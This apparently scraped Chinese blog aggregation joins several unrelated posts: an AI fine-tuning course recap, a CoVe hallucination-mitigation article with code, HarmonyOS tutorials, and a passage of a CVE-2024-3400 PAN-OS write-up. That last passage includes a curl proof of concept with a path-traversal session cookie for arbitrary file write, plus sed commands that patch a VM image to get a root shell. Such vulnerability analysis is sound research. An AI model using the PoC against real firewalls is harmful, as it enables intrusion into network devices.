- 累计GPU/NPU计算时长：超过5,000小时
成果展示墙
- 37个创意微调项目诞生
- 12个项目进入 AI 社区“优秀案例库”
- 最受欢迎应用方向：科研助手、创意写作、代码生成

技术实践全记录：从环境搭建到模型部署

环境配置篇：跨越“第一道门槛”

挑战场景还原：

“老师，torch_npu导入报错了！”
“镜像选择哪一个是正确的？”
——这是开课时最频繁的问题

我们的解决方案：

# 标准化环境配置流程（最终优化版）
# 1. 镜像选择黄金法则
PyTorch (openeuler-python3.10-pytorch2.1.0-openmind0.9.0) 
# 理由：Python3.10兼容性最佳，torch2.1.0与NPU适配最稳定

# 2. 依赖安装“避坑指南”
pip config set global.index-url https://mirrors.aliyun.com/pypi/simple/
pip install torch==2.5.1 torch_npu numpy==1.26.4 transformers==4.52.4
# 关键发现：transformers 4.52.4对中文多模态支持最优

# 3. 环境校验“三连击”
python -c "import torch; import torch_npu; import vllm_ascend"
# 绿色√出现时，教室里响起的掌声至今难忘

教学反思：

提前准备的“常见错误对照表”将问题解决时间缩短70%
“三人小组互助制”让基础较弱的同学也能跟上进度
最受欢迎的教学创新：环境配置“闯关游戏”式教程

模型部署实战：见证“Hello World”时刻

技术路线演进：

Week 1: 基础文本模型 (Qwen2.5-3B)
Week 2: 视觉语言模型 (Qwen2.5-VL-3B)
Week 3: 国产多模态 (InternVL3.5-1B)

代码实践精华：

# 从“复杂难懂”到“一键部署”的蜕变

# 初版（学生普遍反映配置复杂）
# vllm serve /path/to/model --port 8000 --max-model-len 16384 ...

# 优化版（封装为simple_deploy.py）
from deployment_kit import ModelDeployer
deployer = ModelDeployer(model_name="Qwen2.5-VL-3B")
deployer.launch(port=8000, api_type="openai")

# 效果：部署时间从平均30分钟缩短至5分钟

互动环节亮点：

“模型对话接龙”：每组微调一个特色模型，串联成创意故事
“Bug排查大赛”：最快解决部署问题的组获得算力奖励
最惊艳的学生作品：《红楼梦》风格的多模态对话模型

微调实操：让模型拥有“交大基因”

LoRA微调实战案例：

# 交大校史知识注入配置（student_project_01）
model_name: Qwen2.5-7B
dataset: sjtu_history_qa.json  # 学生自建的校史问答对
lora_config:
  r: 16
  alpha: 32
  target_modules: ["q_proj", "v_proj"]
training_args:
  num_epochs: 3
  per_device_train_batch_size: 4
  learning_rate: 2e-4

训练成果展示：

微调前：
问：上海交通大学何时成立？
答：交通大学是一所历史悠久的高校...

微调后：
问：上海交通大学何时成立？
答：上海交通大学前身为1896年创立的南洋公学，1921年定名为交通大学...
问：钱学森图书馆在哪里？
答：位于上海交通大学闵行校区，是为纪念校友钱学森而建...

技术突破点：

显存优化：QLoRA+梯度检查点，7B模型在24G NPU上可训练
数据质量：学生创新的“三阶段数据清洗法”
评估体系：自动化的ROUGE-L+BERTScore双指标评估

社区生态共建：AI 平台深度合作

AI 特色功能实践

功能模块	使用频次	学生评价亮点
模型库一键下载	287次	“比HuggingFace快5倍”
在线Notebook	156次	“随时随地继续实验”
模型市场分享	42次	“看到自己的模型被别人使用很有成就感”

优秀学生项目孵化

项目1：SJTU-CodePal

团队：计算机系3名学生
技术：基于DeepSeek-Coder微调
特色：理解交大课程代码规范（如CS1101实验要求）
成果：被《程序设计基础》课程组采纳为辅助工具

项目2：医工交叉文献助手

团队：医学院+电院跨学科团队
技术：Qwen2.5-VL微调
特色：解析医学影像+文献摘要
成果：在生物医学工程实验室实际部署

总结

当钱学森图书馆的灯光照亮同学们调试代码的身影，当东下院的键盘声敲响AI时代的序曲，我们深切感受到：教育最美的模样，就是点燃学生眼中的光。那些为环境配置而紧锁的眉头，那些看到模型成功响应时绽放的笑容，那些跨学科碰撞出的思想火花——这些瞬间汇聚成了2025年秋天最温暖的记忆。

感谢每一位参与其中的交大学子，你们的热情与创造力是这趟旅程最宝贵的风景。感谢所有支持单位提供的资源保障。人工智能的未来属于青年，而你们，正站在创造未来的起点上。

路虽远，行则将至；事虽难，做则必成。

用提示工程让大模型自己检查自己：CoVe方法有效减少幻觉

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

LLM幻觉问题至今没有根治方案。RAG能缓解一部分，但成本高、架构复杂，而且只适用于有外部知识源的场景。而对于模型"应该知道但经常搞错"的那类问题，比如历史事件的时间线、人物履历的细节，RAG帮不上什么忙。

Chain-of-Verification（CoVe）的思路是既然模型会在生成时犯错，那就让它生成完之后再检查一遍自己的输出，把能发现的错误纠正掉，然后再给用户看。

听起来像是废话？关键在于"怎么检查"。

直接让模型审视自己刚写的东西，它大概率会坚持原有立场，这是确认偏差在作祟。CoVe的核心贡献是发现了一个绕过这个陷阱的方法：验证时必须把原始输出藏起来，让模型在"失忆"状态下重新回答事实性问题，然后用这些独立验证的答案去校对初稿。

某种意义上，这是给LLM装上了"系统2"思维：快思考先出初稿，慢思考再做验证。

工作流程：起草、规划、验证、修复

CoVe不是什么新的模型架构，它是一种提示编排模式，它把生成过程拆成四步：先让模型写初稿（这时候幻觉随便来），然后让它针对自己的初稿生成一组事实核查问题，接着独立回答这些问题，最后用验证过的事实重写原文。

Factored：真正的关键

前面说的四步里，第一、二、四步都是常规提示工程，用思维链就能搞定，而第三步才是核心。

让LLM一边看着自己写的东西一边验证，会有一个问题，这个在学术上管这叫"sycophancy"，也就是说模型会顺着自己的话往下说。草稿就在上下文窗口里摆着，概率分布会被带偏，模型倾向于认同自己刚编出来的东西。

所以最简单的解决办法是把上下文剥掉。

CoVe论文里发现，回答验证问题时必须把原始草稿藏起来。举个例子：如果你问"根据这个草稿，X是不是在1998年发生的？"模型八成会点头同意自己。但如果你只问"X是什么时候发生的？"它就得老老实实从训练权重里检索答案，没有偏差可言。

隔离验证问题就是逼模型去查自己的知识库，而不是复读自己刚说过的话。

代码实现

下面是CoVe流程的Python实现，封装成一个类。注意第三步里的CRITICAL注释，那就是Factored验证的精髓。

 classChainOfVerification:  
    def__init__(self, llm):  
        self.llm=llm  

    defrun(self, query):  
        # Step 1: Baseline Generation
        # Let the model hallucinate freely here.
        draft_prompt=f"Question: {query}\nAnswer:"  
        draft=self.llm.generate(draft_prompt)  
        print(f"--- DRAFT ---\n{draft}\n")  

        # Step 2: Plan Verifications
        # Ask the model to identify what needs checking.
        plan_prompt=f"""  
        Context: {query}  
        Draft: {draft}  
        Task: Create a list of 3-5 verification questions to check the facts   
        in the draft. Output ONLY the questions.  
        """  
        plan_text=self.llm.generate(plan_prompt)  
        questions=self.parse_questions(plan_text)
        print(f"--- QUESTIONS ---\n{questions}\n")  

        # Step 3: Factored Verification (The Key Step)
        verification_results= []  
        forqinquestions:  
            # CRITICAL: Do NOT include 'draft' in this prompt context.
            # We want the raw model weights to answer this, uninfluenced by the previous lie.
            verify_prompt=f"Question: {q}\nAnswer:"  
              
            # Low temperature is crucial here for factual retrieval
            answer=self.llm.generate(verify_prompt, temperature=0)  
            verification_results.append((q, answer))  

        # Step 4: Final Synthesis
        # Now we bring it all together.
        verification_context=self.format_pairs(verification_results)  
        synthesis_prompt=f"""  
        Original Query: {query}  
        Draft Response: {draft}  
          
        Verification Data:  
        {verification_context}  
          
        Task: Rewrite the Draft Response to be fully accurate.   
        Remove any details contradicted by the Verification Data.  
        """  
        final_response=self.llm.generate(synthesis_prompt)  
          
        returnfinal_response  

    defparse_questions(self, text):  
        return [line.strip() forlineintext.split('\n') if'?'inline]  

    defformat_pairs(self, pairs):  
         return"\n".join([f"Q: {q}\nA: {a}"forq, ainpairs])

CoVe和RAG该怎么选？

每次聊到CoVe，总有人问：为什么不直接用RAG？

两者解决的是不同问题。

RAG适用于模型根本不可能知道答案的场景，比如你公司Q3的销售数据。CoVe适用于模型理论上应该知道、但可能搞混或偷懒的场景，比如按时间顺序列出纽约市历任市长。

而且研究表明两者可以混用：先用CoVe验证RAG检索回来的文档是否真的相关，再决定要不要用。代价是成本翻倍，但在医疗、法律这种高风险场景下，还是可行的。

从Vibe Coding到系统2代理

关注2026年初Agentic爆发的人，大概都听过"Ralph Wiggum"技术这个梗。

名字来自《辛普森一家》里那个喊着"我在帮忙！"却啥也没干成的角色。这技术的核心就是把LLM塞进一个while循环，让它反复尝试直到单元测试通过。暴力验证，Token消耗会爆表但最后确实能撞出正确答案。虽然听起来很好笑，实际上还挺管用。

工具增强版CoVe

opencode、OpenDevin、Windsurf这些现代自主代理已经在用"工具增强"版本的CoVe了。

它们不再只是问自己"这代码对不对"，而是直接动手：先写代码，然后在沙盒里跑npm test或linter，读stderr输出，根据真实报错来修。

这就把CoVe的验证环节从概率猜测变成了确定性判断。

2026年的新拓扑：分支验证

最前沿的做法已经不是简单的线性循环了。是分支。

分支拓扑下，代理不是失败了就重试一次。它会同时提出三个修复方案，在三个隔离容器里并行跑，哪个能让构建变绿就提交哪个。

验证的消耗

这是2026年工程实践必须面对问题

Vibe Coding走系统1路线：快、便宜、但有20%左右的幻觉率，做原型够用。系统2代理反过来：慢、Token成本翻10倍、但可靠性过硬，生产环境离不开。

也就是说是拿计算资源换安心，当业务从聊天机器人升级到自主工程师，这笔成本不是能不能接受的问题，而是必须付的保险费——除非你想承担"Ralph Wiggum式"的风险，比如AI自己把数据库删了。

总结

CoVe的代价很明确：延迟。

生成初稿、生成问题、并行验证、综合重写，整套流程跑下来，Token消耗和响应时间基本翻四倍。对于实时聊天场景，这个延迟可能难以接受。但换个角度看，异步报告生成、代码审查、自动邮件起草这类任务，多等几秒换来输出可信度的大幅提升，这笔账怎么算都划算。

更值得关注的是CoVe带来的转变：过去几年，行业把大量精力投入到"如何让模型生成得更好"上——更大的参数、更多的数据、更精细的对齐。CoVe指向了另一个方向：与其追求一次生成就完美，不如承认模型会犯错，然后在架构层面把纠错机制build进去。

这和软件工程的演进路径很像。早期写代码追求一次写对，后来发现测试驱动开发、持续集成、灰度发布这些"验证优先"的实践才是规模化的正确姿势。

CoVe不会是终点，我们未来大概率会看到更多CoVe与RAG、外部工具、多模型交叉验证的组合方案。

https://avoid.overfit.cn/post/1f3da2d8396d44c6bab8bfea80405cb6

作者：Digvijay Mahapatra

一部手机不够玩？鸿蒙如何把多设备变成一个游戏系统（实战解析）

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

在这里插入图片描述

摘要

在游戏领域，这个变化更明显：

一块屏幕已经不够玩
玩家希望多设备一起参与
大屏负责画面，小屏负责操作

但很多开发者一提“跨屏游戏”，第一反应还是投屏、远程控制、镜像显示。
实际上，鸿蒙给的不是投屏方案，而是一整套分布式游戏协作能力。

这篇文章就从游戏开发者的真实视角，讲清楚鸿蒙是如何把多设备变成“一个游戏系统”的。

引言

在传统系统里，如果你想做多设备协作游戏，通常意味着：

自己写网络协议
自己做设备发现
自己处理数据一致性
自己兜底各种异常情况

而在 HarmonyOS 里，这些事情被系统层直接兜住了：

设备发现靠软总线
状态同步靠分布式数据
UI 跨屏靠 Ability 调度

你要做的事情更偏向游戏逻辑设计本身，而不是重复造轮子。

接下来我们一步一步拆。

什么是鸿蒙里的跨屏游戏协作

跨屏不是投屏

先说一个很重要的点：

鸿蒙的跨屏游戏 ≠ 投屏

投屏的特点是：

一端渲染
另一端只是显示
没有真正的协作逻辑

而鸿蒙的跨屏游戏，更像是：

多设备同时运行
各自承担不同功能
通过系统级分布式能力协同

比如：

手机只负责操作和技能
平板或智慧屏负责主战场渲染
游戏状态在多设备之间自动同步

一个最常见的跨屏游戏形态

手机（控制器）
  │
  │ 操作指令
  ▼
平板 / 智慧屏（主画面）
  │
  │ 游戏状态同步
  ▼
分布式数据中心

支撑跨屏游戏的三大核心能力

分布式软总线：设备能“找到彼此”

在游戏里，你最关心的不是网络协议，而是：

能不能快速发现附近设备
延迟够不够低
掉线能不能感知

鸿蒙的分布式软总线解决的正是这些问题。

你不需要关心设备是：

Wi-Fi
蓝牙
局域网
点对点

系统会自动选最优链路。

分布式数据管理：状态天然同步

跨屏游戏最怕的几个问题：

状态不一致
数据打架
玩家看到的画面不同步

鸿蒙提供的分布式 KV 数据，天生适合游戏里的：

玩家位置
血量
技能状态
回合阶段

而且是系统级同步，不是你自己发包。

分布式 UI：屏幕不是绑死的

在鸿蒙里：

Ability 可以被拉起到其他设备
游戏不用重新启动
状态不需要你手动迁移

这对游戏来说很重要，因为你可以自由设计：

哪个屏幕显示什么
玩家如何参与
随时切换设备角色

跨屏游戏的整体架构设计

一个可落地的结构示例

┌────────────┐
│ 手机端     │
│ 操作输入   │
│ 技能按钮   │
└─────┬──────┘
      │
      │ 分布式 KV 数据
      ▼
┌────────────┐
│ 平板端     │
│ 游戏主画面 │
│ 渲染逻辑   │
└────────────┘

手机不负责画面，平板不负责输入，各司其职。

实战核心：跨屏游戏状态同步 Demo

创建分布式 KV Store

import distributedData from '@ohos.data.distributedData';

const kvManager = distributedData.createKVManager({
  bundleName: 'com.example.crossgame',
  context: getContext()
});

const store = await kvManager.getKVStore('gameStore', {
  kvStoreType: distributedData.KVStoreType.SINGLE_VERSION,
  securityLevel: distributedData.SecurityLevel.S1
});

这个 store 在多设备之间是共享的。

手机端发送操作指令

// 模拟摇杆方向
async function sendMove(x: number, y: number) {
  await store.put('player_move', JSON.stringify({
    x,
    y,
    time: Date.now()
  }));
}

这里同步的是“操作”，而不是最终坐标。

平板端监听并更新角色

store.on('dataChange', (data) => {
  data.insertedEntries.forEach(entry => {
    if (entry.key === 'player_move') {
      const move = JSON.parse(entry.value as string);
      updatePlayer(move.x, move.y);
    }
  });
});

跨屏 UI：把主画面拉到大屏

从手机拉起平板的游戏界面

import featureAbility from '@ohos.ability.featureAbility';

featureAbility.startAbility({
  want: {
    bundleName: 'com.example.crossgame',
    abilityName: 'GameMainAbility',
    deviceId: 'remoteDeviceId'
  }
});

前提是：

游戏状态已经存在分布式数据中
新设备启动后直接读取即可

为什么这个能力对游戏很重要

你不需要：

手动传进度
重新初始化状态
处理复杂的恢复逻辑

系统已经帮你兜底。

真实应用场景拆解

场景一：手机当手柄，大屏玩游戏

适合类型

派对游戏
本地多人
家庭娱乐

逻辑示例

// 手机端：技能释放
await store.put('skill_cast', {
  skillId: 2,
  playerId: 'p1'
});

// 大屏端：技能响应
store.on('dataChange', (data) => {
  data.insertedEntries.forEach(e => {
    if (e.key === 'skill_cast') {
      castSkill(e.value);
    }
  });
});

场景二：非对称协作游戏

比如：

一个人当指挥
一个人实际操作

// 指挥端下达命令
await store.put('command', {
  type: 'attack',
  target: 'boss'
});

操作端只负责执行，不做决策。

场景三：教育 + 游戏化互动

老师平板控制节奏，学生手机参与。

// 教师端切换关卡
await store.put('game_stage', 'level_2');

学生端监听并同步切换界面。

常见问题 QA

Q1：分布式 KV 会不会太慢？

不会。
它适合的是：

低频状态
操作指令
游戏阶段

高频帧同步需要更底层方案。

Q2：能不能用在竞技类游戏？

可以，但不建议直接用 KV 同步帧数据。
更适合：

操作同步
客户端预测
状态校正

Q3：设备掉线怎么办？

KV 会自动触发变更事件，你可以监听：

玩家退出
状态回收
AI 接管

总结

从游戏开发角度看，鸿蒙的跨屏协作并不是噱头，而是一套真正能落地的系统能力。

核心就一句话：

多设备在鸿蒙里，不是多个客户端，而是一个分布式游戏系统。

软总线解决连接
分布式数据解决同步
Ability 解决跨屏 UI
ArkTS 足够把 Demo 跑起来

鸿蒙分布式实战：多设备任务到底是怎么“自动分配”的？

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

在这里插入图片描述

摘要

引言

如果放在以前，一个应用基本只跑在一台手机上，最多考虑前后台切换。但现在不一样了：

手机在你手里
平板在桌子上
智慧屏在客厅
手表戴在手上

用户希望的是：
设备不同，但体验是连着的。

鸿蒙系统的分布式能力，正是为这种场景设计的。它不是简单的“跨设备通信”，而是把 任务、数据、能力 都变成可以在多设备之间流动的资源。

而多设备任务分配，本质上就是一句话：

把合适的任务，交给合适的设备去做。

鸿蒙多设备任务分配的整体思路

先发现设备，再谈分配

在鸿蒙系统中，只要设备在同一个分布式网络里，系统就能自动发现它们。
开发者不需要自己维护“设备表”，也不用关心设备什么时候上线、下线。

系统会帮你感知这些信息：

设备类型（手机、平板、智慧屏）
基本性能情况
是否可信
当前是否可用

你只需要在合适的时机拿到设备列表即可。

任务一定要能拆

多设备任务分配的前提是：
你的业务本身是能拆开的。

比如：

页面展示是一块
数据采集是一块
计算处理是一块

如果一个任务从头到尾全写死在一个 Ability 里，那基本就没法分配了。

系统负责“怎么选设备”

在鸿蒙里，真正“选哪台设备执行”的逻辑，大部分是系统完成的：

当前设备忙不忙
网络情况好不好
设备能力是否匹配
是否更适合本地执行

开发者更多是通过 Ability 启动方式、Service 类型、数据同步方式 来间接影响分配结果。

核心实现方式一：跨设备启动 Ability

适合什么场景

这种方式最常见，适合：

页面展示
功能模块整体迁移
用户可感知的交互任务

比如：
手机负责控制，平板负责显示大屏内容。

Demo：在平板上启动远程 Ability

import distributedDeviceManager from '@ohos.distributedDeviceManager';
import featureAbility from '@ohos.ability.featureAbility';

const BUNDLE_NAME = 'com.example.distributeddemo';

let deviceManager = distributedDeviceManager.createDeviceManager(BUNDLE_NAME);

function startRemotePage() {
  let devices = deviceManager.getTrustedDeviceListSync();

  devices.forEach(device => {
    if (device.deviceType === 2) { // 假设 2 表示平板
      let want = {
        bundleName: BUNDLE_NAME,
        abilityName: 'RemotePageAbility',
        deviceId: device.deviceId
      };
      featureAbility.startAbility(want);
    }
  });
}

代码说明

createDeviceManager：创建设备管理器
getTrustedDeviceListSync：获取可信设备列表
deviceType：用于简单区分设备类型
startAbility：指定 deviceId 后，Ability 会在远端设备启动

整个过程不需要你关心远端设备的进程、生命周期，系统会处理。

核心实现方式二：分布式 Service 执行任务

适合什么场景

这种方式更适合：

计算密集型任务
后台处理
不需要 UI 的逻辑

比如：
手机采集数据，交给性能更强的设备做分析。

Demo：连接远端计算 Service

import featureAbility from '@ohos.ability.featureAbility';

function connectRemoteService(remoteDeviceId: string) {
  let want = {
    bundleName: 'com.example.distributeddemo',
    abilityName: 'ComputeServiceAbility',
    deviceId: remoteDeviceId
  };

  featureAbility.connectAbility(want, {
    onConnect(elementName, remote) {
      console.log('远程 Service 已连接');
      remote.sendMessage({
        command: 'startCompute',
        data: [1, 2, 3, 4]
      });
    },
    onDisconnect() {
      console.log('远程 Service 已断开');
    }
  });
}

代码说明

Service 在远端设备运行
本地通过 IPC 的方式和远端通信
计算逻辑完全在远端执行
本地只负责发请求、收结果

这种方式非常适合“重计算、轻交互”的任务。

典型应用场景分析与示例

场景一：手机 + 平板的学习展示系统

场景说明

手机负责控制、翻页
平板负责展示课件内容

实现思路

手机发现平板
在平板启动展示 Ability
通过分布式数据同步当前页码

import distributedData from '@ohos.data.distributedData';

async function syncPage(page: number) {
  let kvManager = distributedData.createKVManager();
  let store = await kvManager.getKVStore('pageStore');
  await store.put('current_page', page);
}

平板端监听数据变化，自动刷新页面。

场景二：多设备健康数据分析

场景说明

手表采集心率
手机做基础处理
平板做数据可视化

实现思路

手表同步原始数据
手机过滤、预处理
平板负责展示图表

核心在于：
任务不是“复制”，而是“分工”。

场景三：家庭智慧屏协同控制

场景说明

手机是遥控器
智慧屏负责 UI 展示
计算逻辑放在智慧屏

实现思路

手机只负责发指令
智慧屏 Service 处理业务逻辑
结果同步回手机

这种模式下，手机压力很小，体验反而更流畅。

常见问题 QA

Q1：我能不能指定“一定要某台设备执行”？

不推荐。
鸿蒙的设计思想是 声明需求，而不是指定设备。
你可以通过能力需求去“引导”，但不建议写死。

Q2：设备突然下线怎么办？

系统会通知连接断开，
你需要做的只有一件事：
支持本地降级执行或重试。

Q3：分布式任务一定比本地慢吗？

不一定。
当任务本身就不适合本地执行时，
分布式反而更快、更省电。

总结

在鸿蒙系统中，多设备任务分配并不是一套复杂、难以理解的机制，它的核心思想其实很简单：

把任务拆清楚
描述好任务需求
把调度交给系统

只要你在设计阶段考虑好“哪些任务适合分出去”，鸿蒙的分布式能力就能自然地帮你把事情做好。

一句话总结就是：

多设备任务分配，不是设备协作有多复杂，而是你有没有把任务设计清楚。

HarmonyOS 中如何避免线程阻塞？从原理到实战的完整解析

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

在这里插入图片描述

摘要

引言

下面我们从原理、工具、代码和真实场景几个角度，完整地拆解这个问题。

为什么线程阻塞在鸿蒙中这么致命

UI 线程到底在忙什么

在 HarmonyOS 中，UI 线程主要负责三件事：

ArkUI 页面渲染
用户事件分发（点击、滑动等）
Ability 生命周期回调

简单理解就是：只要和“看得见、点得动”有关的事情，几乎都在 UI 线程上完成。

一旦你在这里做了耗时操作，比如计算、IO、网络等待，页面就会立刻表现出“卡”的感觉。

常见的阻塞来源

在实际项目中，最容易导致阻塞的操作通常包括：

同步网络请求
文件读写
数据库查询
大量 for 循环计算
人为 sleep 或死循环

这些操作本身不一定是错的，问题在于它们被放在了不该放的线程上。

鸿蒙中避免线程阻塞的核心思路

一个总原则

可以把鸿蒙里的线程使用总结成一句话：

UI 线程只处理 UI，其他事情交给异步、线程池或 Worker。

围绕这个原则，系统也提供了多种工具，帮助开发者把任务“分流”。

异步编程是第一道防线

使用 async / await 处理耗时逻辑

在 ArkTS 中，官方推荐优先使用 Promise 和 async / await。它的好处是代码结构清晰，而且不会阻塞 UI 线程。

示例：页面加载网络数据

@Entry
@Component
struct AsyncDemo {
  @State message: string = '加载中...'

  build() {
    Column() {
      Text(this.message)
        .fontSize(20)
        .margin(20)

      Button('重新加载')
        .onClick(() => {
          this.loadData()
        })
    }
  }

  async loadData() {
    this.message = '请求中...'
    let response = await fetch('https://example.com/data')
    let result = await response.text()
    this.message = result
  }
}

代码说明

loadData 使用 async 声明，不会阻塞 UI
await 只是暂停当前函数执行，不会卡住页面
UI 更新完全由状态变化驱动

这是最基础、也是最常用的一种防阻塞方式。

TaskPool：处理计算和 IO 的利器

什么时候该用 TaskPool

当你遇到下面这些情况时，TaskPool 几乎是必选项：

大量计算
批量数据处理
文件压缩、解析

可运行 Demo 示例

import taskpool from '@ohos.taskpool'

@Concurrent
function calculateSum(count: number): number {
  let sum = 0
  for (let i = 0; i < count; i++) {
    sum += i
  }
  return sum
}

@Entry
@Component
struct TaskPoolDemo {
  @State result: string = '等待计算'

  build() {
    Column() {
      Text(this.result)
        .fontSize(18)
        .margin(20)

      Button('开始计算')
        .onClick(() => {
          this.startTask()
        })
    }
  }

  startTask() {
    this.result = '计算中...'
    taskpool.execute(calculateSum, 1000000).then(res => {
      this.result = `结果是：${res}`
    })
  }
}

代码说明

@Concurrent 表示该函数可以并发执行
TaskPool 自动管理线程，不需要开发者手动创建线程
UI 线程只负责接收结果和更新状态

在真实项目中，使用 TaskPool 往往能立刻解决页面卡顿问题。

Worker：长期后台任务的选择

Worker 的使用场景

如果任务具有下面这些特点，就更适合使用 Worker：

长时间运行
需要持续处理数据
与 UI 强隔离

比如日志分析、音视频处理、复杂解析等。

示例：使用 Worker 处理数据

主线程代码

let worker = new Worker('workers/data_worker.ts')

worker.postMessage({ action: 'start' })

worker.onmessage = (e) => {
  console.log('收到结果：', e.data)
}

Worker 线程代码

onmessage = function (e) {
  if (e.data.action === 'start') {
    let result = 0
    for (let i = 0; i < 500000; i++) {
      result += i
    }
    postMessage(result)
  }
}

代码说明

Worker 与 UI 线程完全独立
即使计算时间较长，也不会影响页面交互
通过消息机制进行通信

结合实际场景的应用示例

场景一：列表页面加载大量数据

问题：

首次进入页面时一次性处理全部数据
页面明显卡顿

解决思路：

网络请求使用 async
数据整理放入 TaskPool

async loadList() {
  let data = await fetchData()
  taskpool.execute(processData, data).then(list => {
    this.list = list
  })
}

场景二：文件导入与解析

问题：

文件较大
解析过程耗时

解决思路：

Worker 负责解析
UI 只显示进度

worker.postMessage({ filePath })

场景三：复杂计算驱动 UI 更新

问题：

计算逻辑和 UI 耦合

解决思路：

计算完全放到 TaskPool
UI 只订阅结果

QA 环节

Q：async / await 会不会阻塞线程？
A：不会，它只是让出执行权，不会卡住 UI 线程。

Q：TaskPool 和 Worker 怎么选？
A：短期、一次性的任务优先 TaskPool，长期或持续任务用 Worker。

Q：能不能在生命周期里做耗时操作？
A：不建议，生命周期函数应尽量轻量。

总结

在真实项目中，提前做好任务拆分、线程规划，比后期排查卡顿要省心得多。这也是鸿蒙开发从“能跑”到“跑得顺”的一个重要分水岭。

如何保障分布式IM聊天系统的消息有序性（即消息不乱）

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

本文引用了45岁老架构师尼恩的技术分享，有修订和重新排版。

1、引言

2、系列文章

3、传统技术方案的瓶颈，怎么破？

4、痛点拆解：为什么消息会乱？

5、最终方案：分而治之 + 局部有序

6、实践落地（核心片段伪代码）

7、方案总结：放弃全局有序，换高可用与高性能

8、 IM消息有序性架构的核心流程总结

—— 下篇《如何保障分布式IM聊天系统的消息可靠性（即消息不丢）》稍后发布，敬请期待 ——

9、参考资料

即时通讯技术学习：

移动端IM开发入门文章：《新手入门一篇就够：从零开发移动端IM》
开源IM框架源码：https://github.com/JackJiang2011/MobileIMSDK（备用地址点此）

（本文已同步发布于：http://www.52im.net/thread-4887-1-1.html）

CVE-2024-3400 Palo Alto Networks PAN-OS命令注入漏洞

作者: 纯情
时间: 2026-01-20
分类: 资讯
评论

CVE-2024-3400 Palo Alto Networks PAN-OS命令注入漏洞

Swing

2024-04-18

CVE-2024-3400

…

TL; DR

4月12日的是看到 paloaltonetworks 有一个安全公告^[1], CVE编号是 CVE-2024-3400，漏洞是一个命令注入，影响的版本如下：

然后在复现的过程中发现 watchTowr Labs^[2] 已经发了他们的分析，那就顺着他们的分析学习下这洞吧，这里提下我的复现版本为 10.2.9

环境搭建

由于漏洞公告^[1]提到，该漏洞的影响需要 PAN-OS 配置 GlobalProtect portal 或者 GlobalProtect gateway，所以我们需要先完整的搭建下我们的环境。

简单说下配置的流程，我这里的配置是参考 QWB S6 Final Pan 这个题目的环境配置的（亏我还能找到这个题目的虚拟机），另外提一句当时强网杯利用的 CVE-2021-3064 这个漏洞还是蛮有意思的。

首先，我的虚拟机有三个网卡，

网卡1是管理口，网卡2准备用来做门户和网关的网段，我这里用的网段是 192.168.100.1/24 。登陆到管理口的后台后，依次设置

NETWORK->接口 设置以太网接口，接口类型设置为 3层，设置 IPV4 的静态 IP

DEVICE->证书管理->证书，生成 RootCert 再基于 RootCert 派发一个 gp_cer

DEVICE->证书管理-> SSL/TLS 服务配置文件 依据 gp_cert 配置 SSL_PROFILE

然后到 NETWORK->GlobalProtect->门户 配置门户，中间可能少了一点东西，这里贴一下我的配置项，缺什么补什么就好了

NETWORK->GlobalProtect->网关 网关配置是也是差不多

然后现在在另外一台虚拟机里，也设置上同样的 192.168.100.1/24 网段的网卡，就可以访问到门户了

由于没有所谓的设备证书，此次漏洞能命令执行提到的 telemetry 功能是不可用状态

访问 https://192.168.1.101/ssl-vpn/hipreport.esp 就是 https://192.168.1.101/ssl-vpn/hipreport.esp 的返回

shell 和文件系统的获取直接用了当时 QWB时候 Larryxi^[3] 大哥提供的方法

patch vmem获取本地shell
- sed -i "s/\/usr\/local\/bin\/cli/\/\/\/\/\/\/\/\/\/\/\/\/bin\/sh/g" PA1029-9aad9851.vmem
- sed -i "s/admin:x:1001:1004/admin:x:0000:0000/g" PA1029-9aad9851.vmem

查看固件内容方式，挂载 vmdk 就行
j

1
2
3

sudo modprobe nbd
sudo qemu-nbd -c /dev/nbd1 /mnt/hgfs/qwb-final/PA-disk1.vmdk
sudo mount /dev/nbd1p2 /mnt/panos/

这样就可以 admin 用户登陆之后是一个 root 权限的 shell ，之后调试之类的也可使用 ssh 登陆

漏洞分析

在^[1] 文章就已经提到了漏洞的触发路径，首先是 gpsvc 文件在处理 Cookie 字段的时候会有一个任意文件写，其次是 telemetry 功能的定时任务 device_telemetry_send 会用 /usr/local/bin/dt_send 发送数据的时候会拼接文件名到命令中，造成命令注入。

我们依次简单分析下

gpsvc 任意文件写分析

通过 netstat 命令，我们可以看到 gpsvc 监听在 20277 端口上，

在查看 /etc/nginx/sslvpn/localtion.conf 的配置文件中，我们看到如下配置

可以看到 ssl-vpn 相关的部分接口为通过 nginx 代理转发到 20177 端口，就是 gpsvc 程序里处理。

逆向分析

我们把程序拿出来分析，坏消息是这个程序是 golang 编写的，好像是有符号，而且我们已经知道了漏洞大致位置，可以通过直接找到 main__ptr_SessDiskStore_New 函数

我们在这个函数里可以看到一个通过 Cookie 里的值然后拼接文件名的操作，

比如我们在 146 行下一个断点，然后使用如下 PoC 触发：

curl -i -s -k -X $'POST' \
-H $'Host: 127.0.0.1' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 158' \
-b $'SESSID=/../../../tmp/hacked' \
--data-binary $'user=watchTowr&portal=watchTowr&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=watchTowr&computer=watchTowr&client-ip=watchTowr&client-ipv6=watchTowr&md5-sum=watchTowr&gwHipReportCheck=watchTowr' \
$'https://192.168.1.101/ssl-vpn/hipreport.esp'

到达main__ptr_SessDiskStore_New 函数的backtrace如下：

(gdb) bt
#0  main.(*SessDiskStore).New (s=0xc000821800, r=0xc00260f400, name=..., ~r2=0x0, ~r3=...)
at /opt/build/bamboo-agent-home-3/xml-data/build-dir/LA-GPSVC131-JOB1/build/src/apps/pan_gpsvc_session.go:103
#1  0x0000000000a472c3 in github.com/gorilla/sessions.(*Registry).Get (s=0xc00c1a6a60, store=..., name=..., session=0x0, err=...)
at /opt/build/bamboo-agent-home-3/xml-data/build-dir/LA-GPSVC131-JOB1/build/src/3p/pkg/mod/github.com/gorilla/sessions@v1.2.1/sessions.go:139
#2  0x0000000000aee55d in main.(*SessDiskStore).Get (s=0xc000821800, r=0xc00260f400, name=..., ~r2=0x0, ~r3=...)
at /opt/build/bamboo-agent-home-3/xml-data/build-dir/LA-GPSVC131-JOB1/build/src/apps/pan_gpsvc_session.go:87
